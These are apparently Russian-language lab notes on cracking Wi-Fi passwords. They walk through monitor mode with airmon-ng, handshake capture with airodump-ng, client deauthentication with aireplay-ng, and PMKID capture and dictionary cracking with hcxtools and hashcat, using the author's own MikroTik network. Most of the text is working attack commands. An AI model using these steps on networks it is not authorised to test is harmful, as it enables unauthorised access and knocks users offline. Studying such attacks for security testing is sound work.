###### tags: `Wi-Fi` `Brute-force` # Перехват и брутфорс Handshake `Необходима wifi-карта, поддерживающая режим мониторинга. (к прим. Realtek RTL8812AU AC1200)` Смотрим оборудование wlan0:  Смотрим какое есть usb оборудование:  Смотрим pci-устройства:  Включаем по ethernet:  Переводим в режим мониторинга карточку: ``` airmon-ng start wlan0 ```  ``` ip a ```  Смотрим, какие есть сетки: ``` airodump-ng wlan0mon ```  Слушаем канал 1 (Mikrotik-2.4Ghz): ``` airodump-ng wlan0mon --channel 1 ``` К микроту поключена точка доступа  Сопоставим какие устройства подлючены к этой точке: ``` airodump-ng wlan0mon ```  ``` nano bssid > два bssid копируем в файл ```  ``` mkdir CSB-4n cd CSB-4n airodump-ng wlan0mon --channel 1 -w dump-1 ``` Поймали хендшейк подключившегося устройства:   #####Деаутентификацию клиентов делаем (hackware.ru)  ``` aireplay-ng -0 10 -a MAC -c MAC ```  Получили хендшейк нового клиента:  #hashcat.net/cap2hashcat/ подбираем:  ?d - один символ в пароле;  # Перехват и брутфорс PMKID https://telegra.ph/Vzlamyvaem-WiFi-s-pomoshchyu-PMKID-11-15 https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-passwords-using-new-pmkid-hashcat-attack-0189379/ ``` apt install hcxdumptool apt install hcxtools airodump-ng wlan0mon ``` Появился prism0:   Ждем пока появится PMKID (кто-то зайдет к примеру в сеть нашу):  ``` hcxpcaptool -E essidlist -I identitylist -U usernamelist -z pmkid.16800 pmkid.pcapng ``` Брутим по словарю: ``` hashcat -m 16800 pmkid.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt' ``` либо так:  Взломано: